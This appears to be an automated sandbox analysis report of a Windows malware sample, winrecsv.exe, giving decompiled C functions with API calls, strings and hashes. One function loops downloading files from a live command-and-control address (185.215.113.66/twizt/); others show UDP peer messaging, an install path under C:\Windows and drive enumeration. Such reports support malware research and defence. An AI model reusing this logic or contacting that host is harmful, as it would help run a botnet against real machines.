                                                                                  						HttpQueryInfoA(_v8, 0x20000005,  &_v20,  &_v24, 0);
                                                                                  						if(_v20 > 0x1388 && _v20 !=  *_a8) {
                                                                                  							 *_a8 = _v20;
                                                                                  							_v9 = 1;
                                                                                  						}
                                                                                  						InternetCloseHandle(_v8); // executed
                                                                                  					}
                                                                                  					InternetCloseHandle(_v16);
                                                                                  				}
                                                                                  				return _v9;
                                                                                  			}
                                                                                  Instruction addresses (side column, one per C-code line above): 0x0040d7f6, 0x0040d807, 0x0040d80d, 0x0040d814, 0x0040d826, 0x0040d82c, 0x0040d833, 0x0040d835, 0x0040d84f, 0x0040d85c, 0x0040d86e, 0x0040d870, 0x0040d870, 0x0040d878, 0x0040d878, 0x0040d882, 0x0040d882, 0x0040d88e

                                                                                  APIs
                                                                                  • InternetOpenA.WININET(Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36,00000001,00000000,00000000,00000000), ref: 0040D807
                                                                                  • InternetOpenUrlA.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 0040D826
                                                                                  • HttpQueryInfoA.WININET(00000000,20000005,?,00000004,00000000), ref: 0040D84F
                                                                                  • InternetCloseHandle.WININET(00000000), ref: 0040D878
                                                                                  • InternetCloseHandle.WININET(00000000), ref: 0040D882
                                                                                  Strings
                                                                                  • Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36, xrefs: 0040D802
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.606907194.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000005.00000002.606897136.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                  • Associated: 00000005.00000002.606945122.0000000000410000.00000002.00000001.01000000.00000004.sdmp
                                                                                  • Associated: 00000005.00000002.606960359.0000000000413000.00000004.00000001.01000000.00000004.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_400000_winrecsv.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Internet$CloseHandleOpen$HttpInfoQuery
                                                                                  • String ID: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36
                                                                                  • API String ID: 3871184103-2352012373
                                                                                  • Opcode ID: 6a61b89792010d5137e947f11a542a7cbeedc3085e70793a22fad245e61e0421
                                                                                  • Instruction ID: 266a7dd59df556f887e0a4dfc4e5eaf5996777bbeb911e957400ba413950654c
                                                                                  • Opcode Fuzzy Hash: 6a61b89792010d5137e947f11a542a7cbeedc3085e70793a22fad245e61e0421
                                                                                  • Instruction Fuzzy Hash: 1A110A75E40208ABDB10DFD4CC49FDEB7B5AB08700F1085A5F9116B2D0C7B5AA44CB55
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 100%
                                                                                  			E0040BF50(signed int* _a4, long _a8, _Unknown_base(*)()* _a12, void* _a16, DWORD* _a20, HANDLE* _a24) {
                                                                                  				long _v8;
                                                                                  				signed int* _v12;
                                                                                  				void* _v16;
                                                                                  				void* _t45;
                                                                                  				void* _t49;
                                                                                  
                                                                                  				_v8 = 0;
                                                                                  				if(_a4 == 0) {
                                                                                  					L8:
                                                                                  					return _v8;
                                                                                  				}
                                                                                  				_v12 = _a4;
                                                                                  				EnterCriticalSection( &(_v12[1]));
                                                                                  				E0040BED0( &(_v12[1]), _v12);
                                                                                  				if(_a12 != 0) {
                                                                                  					_v12[7] = E00408EA0(_v12[7], 4 +  *_v12 * 4, _v12[7], 4 +  *_v12 * 4);
                                                                                  					if(_v12[7] != 0) {
                                                                                  						_t45 = CreateThread(0, _a8, _a12, _a16, 0, _a20); // executed
                                                                                  						_v16 = _t45;
                                                                                  						if(_v16 != 0) {
                                                                                  							 *((intOrPtr*)(_v12[7] +  *_v12 * 4)) = _v16;
                                                                                  							 *_v12 =  *_v12 + 1;
                                                                                  							if(_a24 != 0) {
                                                                                  								_t49 = GetCurrentProcess();
                                                                                  								DuplicateHandle(GetCurrentProcess(), _v16, _t49, _a24, 0, 0, 2);
                                                                                  							}
                                                                                  							_v8 = 1;
                                                                                  						}
                                                                                  					}
                                                                                  				}
                                                                                  				LeaveCriticalSection( &(_v12[1]));
                                                                                  				goto L8;
                                                                                  			}
                                                                                  Instruction addresses (side column, one per C-code line above): 0x0040bf56, 0x0040bf61, 0x0040c038, 0x0040c03e, 0x0040c03e, 0x0040bf6a, 0x0040bf74, 0x0040bf7e, 0x0040bf8a, 0x0040bfaf, 0x0040bfb9, 0x0040bfcf, 0x0040bfd5, 0x0040bfdc, 0x0040bfec, 0x0040bffa, 0x0040c000, 0x0040c00c, 0x0040c01e, 0x0040c01e, 0x0040c024, 0x0040c024, 0x0040bfdc, 0x0040bfb9, 0x0040c032, 0x00000000

                                                                                  APIs
                                                                                  • EnterCriticalSection.KERNEL32(-00000004,00000000), ref: 0040BF74
                                                                                    • Part of subcall function 0040BED0: WaitForSingleObject.KERNEL32(?,00000000), ref: 0040BF10
                                                                                    • Part of subcall function 0040BED0: CloseHandle.KERNEL32(?), ref: 0040BF29
                                                                                  • CreateThread.KERNELBASE ref: 0040BFCF
                                                                                  • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002), ref: 0040C00C
                                                                                  • GetCurrentProcess.KERNEL32(00000000,00000000), ref: 0040C017
                                                                                  • DuplicateHandle.KERNEL32(00000000), ref: 0040C01E
                                                                                  • LeaveCriticalSection.KERNEL32(-00000004), ref: 0040C032
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.606907194.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000005.00000002.606897136.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                  • Associated: 00000005.00000002.606945122.0000000000410000.00000002.00000001.01000000.00000004.sdmp
                                                                                  • Associated: 00000005.00000002.606960359.0000000000413000.00000004.00000001.01000000.00000004.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_400000_winrecsv.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: CriticalCurrentHandleProcessSection$CloseCreateDuplicateEnterLeaveObjectSingleThreadWait
                                                                                  • String ID:
                                                                                  • API String ID: 2251373460-0
                                                                                  • Opcode ID: d9072ebd16b6812de4560c3d06914d0ae5d8c789f3c20ec82b6015f19e15eb00
                                                                                  • Instruction ID: 5aaab35954c252b20d942d79868cba7d8a41f7cfd36b01251640d95963f0b6d7
                                                                                  • Opcode Fuzzy Hash: d9072ebd16b6812de4560c3d06914d0ae5d8c789f3c20ec82b6015f19e15eb00
                                                                                  • Instruction Fuzzy Hash: 23311E74A00208EFDB04DF94D889F9EBBB5FF48314F1081A9E905A7391D779AA81CF94
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 91%
                                                                                  			E00405900() {
                                                                                  				intOrPtr _v8;
                                                                                  				intOrPtr _v12;
                                                                                  				intOrPtr _v16;
                                                                                  				intOrPtr _v20;
                                                                                  				intOrPtr _v24;
                                                                                  				intOrPtr _v28;
                                                                                  				intOrPtr _v32;
                                                                                  				intOrPtr _v36;
                                                                                  				intOrPtr _v40;
                                                                                  				signed int _v44;
                                                                                  				char _v148;
                                                                                  				intOrPtr _v152;
                                                                                  				intOrPtr _v156;
                                                                                  				intOrPtr _v160;
                                                                                  				intOrPtr _v164;
                                                                                  				intOrPtr _v168;
                                                                                  				intOrPtr _v172;
                                                                                  				signed int _v176;
                                                                                  				signed char _t36;
                                                                                  				void* _t46;
                                                                                  				void* _t47;
                                                                                  
                                                                                  				_v44 = 0;
                                                                                  				_v40 = 0;
                                                                                  				_v36 = 0;
                                                                                  				_v32 = 0;
                                                                                  				_v28 = 0;
                                                                                  				_v24 = 0;
                                                                                  				_v20 = 0;
                                                                                  				_v16 = 0;
                                                                                  				_v12 = 0;
                                                                                  				_v8 = 0;
                                                                                  				_v172 = 0x411138;
                                                                                  				_v168 = 0x41113c;
                                                                                  				_v164 = 0x411140;
                                                                                  				_v160 = 0x411144;
                                                                                  				_v156 = 0x411148;
                                                                                  				_v152 = 0x41114c;
                                                                                  				while(1) {
                                                                                  					Sleep(0x3e8); // executed
                                                                                  					_v176 = 0;
                                                                                  					while(_v176 < 6) {
                                                                                  						Sleep(0x3e8); // executed
                                                                                  						_push( *((intOrPtr*)(_t46 + _v176 * 4 - 0xa8)));
                                                                                  						_push("http://185.215.113.66/twizt/");
                                                                                  						wsprintfA( &_v148, "%s%s");
                                                                                  						_t36 = E0040D7F0( &_v148, _t46 + _v176 * 4 - 0x28); // executed
                                                                                  						_t47 = _t47 + 0x18;
                                                                                  						if((_t36 & 0x000000ff) == 1) {
                                                                                  							E0040D890( &_v148, 0); // executed
                                                                                  							_t47 = _t47 + 8;
                                                                                  						}
                                                                                  						_v176 = _v176 + 1;
                                                                                  					}
                                                                                  					Sleep(0xdbba0); // executed
                                                                                  				}
                                                                                  			}

                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.606907194.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000005.00000002.606897136.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                  • Associated: 00000005.00000002.606945122.0000000000410000.00000002.00000001.01000000.00000004.sdmp
                                                                                  • Associated: 00000005.00000002.606960359.0000000000413000.00000004.00000001.01000000.00000004.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_400000_winrecsv.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Sleep$wsprintf
                                                                                  • String ID: %s%s$http://185.215.113.66/twizt/
                                                                                  • API String ID: 3195947292-3378761964
                                                                                  • Opcode ID: 073bb2fb0fef4dcd1ca273c0c354560f53e1d9e1eca1e683211fec216546dafb
                                                                                  • Instruction ID: 33ee1419d531fd34fd9c2865182aea181f8c03b5f59c5093f7aa5c1a3f23e5cd
                                                                                  • Opcode Fuzzy Hash: 073bb2fb0fef4dcd1ca273c0c354560f53e1d9e1eca1e683211fec216546dafb
                                                                                  • Instruction Fuzzy Hash: 7F2151B0D00318EFDB50DFA4CD45BDEBBB4BB09304F5081AAD64DB6281E7785A848F69
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 68%
                                                                                  			E0040DF70(int __eax, long _a4, void* _a8, intOrPtr _a12, short _a16) {
                                                                                  				short _v6;
                                                                                  				short _v10;
                                                                                  				short _v14;
                                                                                  				short _v18;
                                                                                  				short _v20;
                                                                                  				short _v22;
                                                                                  				int* _v24;
                                                                                  				char _v25;
                                                                                  				char _v29;
                                                                                  				int* _v52;
                                                                                  				char _v53;
                                                                                  				short _t30;
                                                                                  				short _t35;
                                                                                  				long _t38;
                                                                                  				int* _t45;
                                                                                  				intOrPtr* _t50;
                                                                                  				void* _t60;
                                                                                  				int _t64;
                                                                                  				long _t67;
                                                                                  
                                                                                  				_t50 = _a4;
                                                                                  				_t64 = __eax;
                                                                                  				_t30 = 0;
                                                                                  				_v25 = 0;
                                                                                  				if(_t50 == 0 ||  *_t50 != 0x756470 || _a8 == 0 || __eax == 0) {
                                                                                  					L12:
                                                                                  					return _t30;
                                                                                  				} else {
                                                                                  					_t60 = __eax + 4;
                                                                                  					_t45 = E00408E60(_t60);
                                                                                  					_t6 =  &(_t45[1]); // 0x4
                                                                                  					_v24 = _t45;
                                                                                  					 *_t45 = _t64;
                                                                                  					memcpy(_t6, _a8, _t64);
                                                                                  					_v18 = 0;
                                                                                  					_v14 = 0;
                                                                                  					_v10 = 0;
                                                                                  					_v6 = 0;
                                                                                  					_t35 = _a16;
                                                                                  					_v20 = 2;
                                                                                  					__imp__#9(_t35);
                                                                                  					_v22 = _t35;
                                                                                  					_v20 = _a12;
                                                                                  					if(_t60 == 0) {
                                                                                  						L10:
                                                                                  						_v29 = 1;
                                                                                  						E00408FB0(_t45);
                                                                                  						return _v29;
                                                                                  					} else {
                                                                                  						while(1) {
                                                                                  							_t38 = _a4;
                                                                                  							__imp__#20( *((intOrPtr*)(_t38 + 8)), _t45, _t60, 0,  &_v24, 0x10); // executed
                                                                                  							_t67 = _t38;
                                                                                  							if(_t67 == 0xffffffff) {
                                                                                  								break;
                                                                                  							}
                                                                                  							InterlockedExchangeAdd(_a4 + 0x1c, _t67);
                                                                                  							_t60 = _t60 - _t67;
                                                                                  							_t45 = _t45 + _t67;
                                                                                  							if(_t60 != 0) {
                                                                                  								continue;
                                                                                  							} else {
                                                                                  								_v53 = 1;
                                                                                  								E00408FB0(_v52);
                                                                                  								return _v53;
                                                                                  							}
                                                                                  							goto L13;
                                                                                  						}
                                                                                  						if(_t60 != 0) {
                                                                                  							E00408FB0(_v52);
                                                                                  							_t30 = _v53;
                                                                                  							goto L12;
                                                                                  						} else {
                                                                                  							_t45 = _v52;
                                                                                  							goto L10;
                                                                                  						}
                                                                                  					}
                                                                                  				}
                                                                                  				L13:
                                                                                  			}

                                                                                  APIs
                                                                                  • memcpy.NTDLL(00000004,00000000,?,?), ref: 0040DFC7
                                                                                  • htons.WS2_32(?), ref: 0040DFF0
                                                                                  • sendto.WS2_32(?,00000000,?,00000000,?,00000010), ref: 0040E018
                                                                                  • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 0040E02D
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.606907194.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000005.00000002.606897136.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                  • Associated: 00000005.00000002.606945122.0000000000410000.00000002.00000001.01000000.00000004.sdmp
                                                                                  • Associated: 00000005.00000002.606960359.0000000000413000.00000004.00000001.01000000.00000004.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_400000_winrecsv.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: ExchangeInterlockedhtonsmemcpysendto
                                                                                  • String ID: pdu
                                                                                  • API String ID: 2164660128-2320407122
                                                                                  • Opcode ID: ad203699c0f73e1d20fa981d9dd844b3e240f33b07fa194a24806bbeb4069567
                                                                                  • Instruction ID: d66807eb1e7b0d5154e21252e4693ec0aa38c6c5b5b9df1ad79a440d19662bd5
                                                                                  • Opcode Fuzzy Hash: ad203699c0f73e1d20fa981d9dd844b3e240f33b07fa194a24806bbeb4069567
                                                                                  • Instruction Fuzzy Hash: 8B31F2362043119FC710DF69D880A9BB7E4AFC9714F04497EF99897381DA7489198BEB
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • CoInitializeEx.OLE32(00000000,00000002,?,?,00406874), ref: 004057B8
                                                                                  • SysAllocString.OLEAUT32(C:\Windows\winrecsv.exe), ref: 004057C3
                                                                                  • CoUninitialize.OLE32 ref: 004057E8
                                                                                    • Part of subcall function 00405520: SysFreeString.OLEAUT32(00000000), ref: 00405738
                                                                                  • SysFreeString.OLEAUT32(00000000), ref: 004057E2
                                                                                  Strings
                                                                                  • C:\Windows\winrecsv.exe, xrefs: 004057BE
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.606907194.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000005.00000002.606897136.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                  • Associated: 00000005.00000002.606945122.0000000000410000.00000002.00000001.01000000.00000004.sdmp
                                                                                  • Associated: 00000005.00000002.606960359.0000000000413000.00000004.00000001.01000000.00000004.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_400000_winrecsv.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: String$Free$AllocInitializeUninitialize
                                                                                  • String ID: C:\Windows\winrecsv.exe
                                                                                  • API String ID: 459949847-134380739
                                                                                  • Opcode ID: b8475d7346bb43be32fa0760030d30944301d8ab8fa8548105178a417464336f
                                                                                  • Instruction ID: ed05d97b5b317eb6b2af260c68b5e38350126176a91c2a59017ff1c3aafa5288
                                                                                  • Opcode Fuzzy Hash: b8475d7346bb43be32fa0760030d30944301d8ab8fa8548105178a417464336f
                                                                                  • Instruction Fuzzy Hash: A8E04875941308FBD700DBE0ED0EB9E7778DB05701F108175F90567291D6B55E80DB59
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 100%
                                                                                  			E0040E0A0(intOrPtr* __ebx, void* __edi) {
                                                                                  				void* _t8;
                                                                                  				intOrPtr* _t18;
                                                                                  				intOrPtr _t23;
                                                                                  				intOrPtr _t26;
                                                                                  				void* _t28;
                                                                                  
                                                                                  				_t18 = __ebx;
                                                                                  				// Only act on a context object tagged with the magic 0x756470 ("pdu" in little-endian ASCII).
                                                                                  				if(__ebx != 0 &&  *__ebx == 0x756470) {
                                                                                  					// Signal the stop event at +0x10 and wait for the worker thread handle at +0x14 to finish.
                                                                                  					SetEvent( *(__ebx + 0x10));
                                                                                  					WaitForSingleObject( *(__ebx + 0x14), 0xffffffff);
                                                                                  					CloseHandle( *(__ebx + 0x14));
                                                                                  					_t26 =  *((intOrPtr*)(__ebx + 0x20)); // head of a singly linked list at +0x20
                                                                                  					if(_t26 == 0) {
                                                                                  						L6:
                                                                                  						E00409940( *((intOrPtr*)(_t18 + 8))); // executed; releases the resource stored at +0x08
                                                                                  						return E00408FB0(_t18); // free the context object itself (HeapFree wrapper)
                                                                                  					}
                                                                                  					// Walk the list: free each node's payload (+0x18), then the node, following the next pointer (+0x1c).
                                                                                  					do {
                                                                                  						E00408FB0( *((intOrPtr*)(_t26 + 0x18)));
                                                                                  						_t23 =  *((intOrPtr*)(_t26 + 0x1c));
                                                                                  						E00408FB0(_t26);
                                                                                  						_t28 = _t28 + 8;
                                                                                  						_t26 = _t23;
                                                                                  					} while (_t23 != 0);
                                                                                  					goto L6;
                                                                                  				}
                                                                                  				return _t8; // decompiler artifact: eax is left unchanged on this path
                                                                                  			}


                                                                                  APIs
                                                                                  • SetEvent.KERNEL32(?,?,0040E195,?,?,0040C2CE,00000000), ref: 0040E0B1
                                                                                  • WaitForSingleObject.KERNEL32(?,000000FF,?,0040E195,?,?,0040C2CE,00000000), ref: 0040E0BD
                                                                                  • CloseHandle.KERNEL32(?,?,0040E195,?,?,0040C2CE,00000000), ref: 0040E0C7
                                                                                    • Part of subcall function 00408FB0: HeapFree.KERNEL32(00930000,00000000,00401192,?,00401192,?), ref: 0040900B
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.606907194.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000005.00000002.606897136.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                  • Associated: 00000005.00000002.606945122.0000000000410000.00000002.00000001.01000000.00000004.sdmp
                                                                                  • Associated: 00000005.00000002.606960359.0000000000413000.00000004.00000001.01000000.00000004.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_400000_winrecsv.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: CloseEventFreeHandleHeapObjectSingleWait
                                                                                  • String ID: pdu
                                                                                  • API String ID: 309973729-2320407122
                                                                                  • Opcode ID: 8fe05da971c099299698b469a649331a8def73c54f65e43091863788282114f1
                                                                                  • Instruction ID: f8868823fc7079781ad89b5054c4351009e6be9a29e70cb83faf709a4bea03a0
                                                                                  • Opcode Fuzzy Hash: 8fe05da971c099299698b469a649331a8def73c54f65e43091863788282114f1
                                                                                  • Instruction Fuzzy Hash: 7FF0C2B64002209BCB209F66EC84D577779AE843203044A7EFD516B38ACE78EC51C7A9
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 100%
                                                                                  			E004047E0(WCHAR* _a4) {
                                                                                  				int _v8;
                                                                                  				short _v1052;
                                                                                  				int _v1056;
                                                                                  				int _t14;
                                                                                  				long _t17;
                                                                                  				int _t18;
                                                                                  
                                                                                  				_t14 = GetDriveTypeW(_a4); // executed
                                                                                  				_v8 = _t14;
                                                                                  				_v1056 = _v8;
                                                                                  				// Only DRIVE_REMOVABLE (2), DRIVE_FIXED (3) and DRIVE_RAMDISK (6) are examined further.
                                                                                  				if(_v1056 >= 2 && (_v1056 <= 3 || _v1056 == 6)) {
                                                                                  					// Resolve the drive letter to its NT device name (buffer of 0x208 WCHARs).
                                                                                  					_t17 = QueryDosDeviceW(_a4,  &_v1052, 0x208); // executed
                                                                                  					if(_t17 != 0) {
                                                                                  						// A target starting with "\??\" is a SUBST-style mapping, not a physical device;
                                                                                  						// report it as DRIVE_NO_ROOT_DIR (1) so the caller skips it.
                                                                                  						_t18 = StrCmpNW( &_v1052, L"\\??\\", 4); // executed
                                                                                  						if(_t18 == 0) {
                                                                                  							_v8 = 1;
                                                                                  						}
                                                                                  					}
                                                                                  				}
                                                                                  				return _v8; // the (possibly overridden) drive type
                                                                                  			}


                                                                                  APIs
                                                                                  • GetDriveTypeW.KERNELBASE(0040489F), ref: 004047ED
                                                                                  • QueryDosDeviceW.KERNELBASE(0040489F,?,00000208), ref: 0040482C
                                                                                  • StrCmpNW.KERNELBASE(?,\??\,00000004), ref: 00404844
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.606907194.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000005.00000002.606897136.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                  • Associated: 00000005.00000002.606945122.0000000000410000.00000002.00000001.01000000.00000004.sdmp
                                                                                  • Associated: 00000005.00000002.606960359.0000000000413000.00000004.00000001.01000000.00000004.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_400000_winrecsv.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: DeviceDriveQueryType
                                                                                  • String ID: \??\
                                                                                  • API String ID: 1681518211-3047946824
                                                                                  • Opcode ID: 2b4ad6813e30ca617d8286429adeb6bd2046491341813551861da181f93699b6
                                                                                  • Instruction ID: 5abcc523fc43e3b538995df9ae9ab9c5832e94dc02c2deabd9e765cd8bb00b71
                                                                                  • Opcode Fuzzy Hash: 2b4ad6813e30ca617d8286429adeb6bd2046491341813551861da181f93699b6
                                                                                  • Instruction Fuzzy Hash: 2D01FFB594020CEBCF20EF95CD497D977B8AB44704F00C4BAAB18A7290D6799AC5CF98
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 100%
                                                                                  			E0040D530(char _a4) {
                                                                                  				long _v8;
                                                                                  				void* _v12;
                                                                                  				void* _t10;
                                                                                  				intOrPtr* _t2;
                                                                                  
                                                                                  				_v8 = 0; // size to return; stays 0 if the file cannot be opened
                                                                                  				_t2 =  &_a4; // 0x4050e0 (the argument slot holds a pointer to the file name)
                                                                                  				// GENERIC_READ (0x80000000), FILE_SHARE_READ (1), OPEN_EXISTING (3)
                                                                                  				_t10 = CreateFileW( *_t2, 0x80000000, 1, 0, 3, 0, 0); // executed
                                                                                  				_v12 = _t10;
                                                                                  				if(_v12 != 0xffffffff) { // INVALID_HANDLE_VALUE
                                                                                  					_v8 = GetFileSize(_v12, 0);
                                                                                  					FindCloseChangeNotification(_v12); // executed; used here to close the file handle
                                                                                  				}
                                                                                  				return _v8;
                                                                                  			}


                                                                                  APIs
                                                                                  • CreateFileW.KERNELBASE(P@,80000000,00000001,00000000,00000003,00000000,00000000,004050E0), ref: 0040D550
                                                                                  • GetFileSize.KERNEL32(000000FF,00000000), ref: 0040D565
                                                                                  • FindCloseChangeNotification.KERNELBASE(000000FF), ref: 0040D572
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.606907194.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000005.00000002.606897136.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                  • Associated: 00000005.00000002.606945122.0000000000410000.00000002.00000001.01000000.00000004.sdmp
                                                                                  • Associated: 00000005.00000002.606960359.0000000000413000.00000004.00000001.01000000.00000004.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_400000_winrecsv.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: File$ChangeCloseCreateFindNotificationSize
                                                                                  • String ID: P@
                                                                                  • API String ID: 4178644524-676759640
                                                                                  • Opcode ID: bc44828a6da30a9cad1c5fe3b81ddf2eba58198aecc4cfa5820a2fec73a274a6
                                                                                  • Instruction ID: ef73fbcfdb561ef279eb64d7b78e57dedde01b6ae7d936de3e3fbaf211c6e608
                                                                                  • Opcode Fuzzy Hash: bc44828a6da30a9cad1c5fe3b81ddf2eba58198aecc4cfa5820a2fec73a274a6
                                                                                  • Instruction Fuzzy Hash: A5F01C74A40308FBDB20DFA4DC49F9D7BB4AB08711F208294FA447B2C0D6B56A808B48
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 64%
                                                                                  			E0040DE70(char* __edx, intOrPtr _a4) {
                                                                                  				short _v18;
                                                                                  				short _v22;
                                                                                  				short _v26;
                                                                                  				short _v28;
                                                                                  				short _v30;
                                                                                  				char _v32;
                                                                                  				char _v36;
                                                                                  				intOrPtr _v40;
                                                                                  				intOrPtr _v44;
                                                                                  				char _v56;
                                                                                  				intOrPtr _v68;
                                                                                  				char* _t23;
                                                                                  				short _t26;
                                                                                  				long _t29;
                                                                                  				short _t34;
                                                                                  				intOrPtr _t37;
                                                                                  				char* _t40;
                                                                                  				intOrPtr _t43;
                                                                                  				long _t47;
                                                                                  				signed int _t48;
                                                                                  				void* _t50;
                                                                                  
                                                                                  				_t40 = __edx;
                                                                                  				_t50 = (_t48 & 0xfffffff8) - 0x1c;
                                                                                  				_t34 = 0; // receive buffer, allocated lazily below
                                                                                  				_t43 = _a4; // context: socket at +0x08, stop event at +0x10, byte counter at +0x18
                                                                                  				_v28 = 0;
                                                                                  				do {
                                                                                  					_t23 =  &_v32;
                                                                                  					_v32 = 0;
                                                                                  					// ioctlsocket(sock, FIONREAD = 0x4004667f, &pending) - how many bytes are waiting to be read
                                                                                  					__imp__#10( *(_t43 + 8), 0x4004667f, _t23); // executed
                                                                                  					if(_t23 == 0xffffffff) { // SOCKET_ERROR
                                                                                  						break;
                                                                                  					}
                                                                                  					_t37 = _v44;
                                                                                  					if(_t37 != 0) {
                                                                                  						// Grow the buffer when no buffer exists yet or the pending size exceeds the current one.
                                                                                  						if(_t34 == 0 || _v40 < _t37) {
                                                                                  							_v40 = _t37;
                                                                                  							_t26 = E00408EA0(_t37, _t40, _t34, _t37);
                                                                                  							_t37 = _v44;
                                                                                  							_t50 = _t50 + 8;
                                                                                  							_t34 = _t26;
                                                                                  						}
                                                                                  						// Zero a 16-byte sockaddr and set its length (0x10) for recvfrom.
                                                                                  						_v30 = 0;
                                                                                  						_v26 = 0;
                                                                                  						_v22 = 0;
                                                                                  						_v18 = 0;
                                                                                  						_t29 =  *(_t43 + 8);
                                                                                  						_v32 = 0;
                                                                                  						_t40 =  &_v32;
                                                                                  						_v36 = 0x10;
                                                                                  						// recvfrom(sock, buf, len, 0, &from, &fromlen)
                                                                                  						__imp__#17(_t29, _t34, _t37, 0,  &_v32,  &_v36);
                                                                                  						_t47 = _t29;
                                                                                  						if(_t47 != 0xffffffff && _t47 != 0) {
                                                                                  							// Account the received bytes and hand the datagram plus sender address to the handler.
                                                                                  							InterlockedExchangeAdd(_t43 + 0x18, _t47);
                                                                                  							_t40 =  &_v56;
                                                                                  							E0040DD40(_t43, _t34, _t47, _v68,  &_v56);
                                                                                  							_t50 = _t50 + 0x14;
                                                                                  						}
                                                                                  					}
                                                                                  				// Poll the stop event at +0x10 with a 1 ms timeout; keep looping while it is not signalled (WAIT_TIMEOUT = 0x102).
                                                                                  				} while (WaitForSingleObject( *(_t43 + 0x10), 1) == 0x102);
                                                                                  				return E00408FB0(_t34); // free the receive buffer on exit
                                                                                  			}


                                                                                  APIs
                                                                                  • ioctlsocket.WS2_32 ref: 0040DE9B
                                                                                  • recvfrom.WS2_32 ref: 0040DF08
                                                                                  • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 0040DF1E
                                                                                  • WaitForSingleObject.KERNEL32(?,00000001), ref: 0040DF3F
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.606907194.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000005.00000002.606897136.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                  • Associated: 00000005.00000002.606945122.0000000000410000.00000002.00000001.01000000.00000004.sdmp
                                                                                  • Associated: 00000005.00000002.606960359.0000000000413000.00000004.00000001.01000000.00000004.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_400000_winrecsv.jbxd
                                                                                  Yara matches
                                                                                  Similarity
